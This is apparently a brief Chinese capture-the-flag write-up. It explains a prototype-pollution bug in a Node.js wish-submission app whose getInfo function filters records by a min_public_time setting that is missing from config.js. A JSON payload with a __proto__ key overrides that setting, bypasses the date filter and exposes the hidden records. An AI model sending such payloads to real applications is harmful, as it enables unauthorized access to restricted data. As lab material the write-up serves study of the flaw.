没细看

{
	"date":"1",
	"place":"1",
	"contact":"1",
	"reason":"1",  
	"__proto__": {    
		"min_public_time": "1001-01-01"  
	}
}

漏洞是

async function getInfo(timestamp) {
    // Ensure the timestamp is a number or default to the current time
    timestamp = typeof timestamp === "number" ? timestamp : Date.now();

    // Remove test data from before the movie was released
    let minTimestamp = new Date(CONFIG.min_public_time || DEFAULT_CONFIG.min_public_time).getTime();
    timestamp = Math.max(timestamp, minTimestamp);

    // Fetch data from the database
    try {
        const data = await sql.all(
            `SELECT wishid, date, place, contact, reason, timestamp FROM wishes WHERE timestamp >= ?`,
            [timestamp]
        );
        return data;
    } catch (e) {
        throw e;
    }
}

其中第4行和第5行将我们传入的timestamp做了一个过滤,使得所返回的数据不早于配置文件中的min_public_time

查看根目录下的config.jsconfig.default.js后发现config.js并没有配置min_public_time,因此getInfo的第5行只是采用了DEFAULT_CONFIG.min_public_time

考虑原型链污染污染min_public_time为我们想要的日期,就能绕过最早时间限制,获取任意时间的数据

然后submit里面一个原型链污染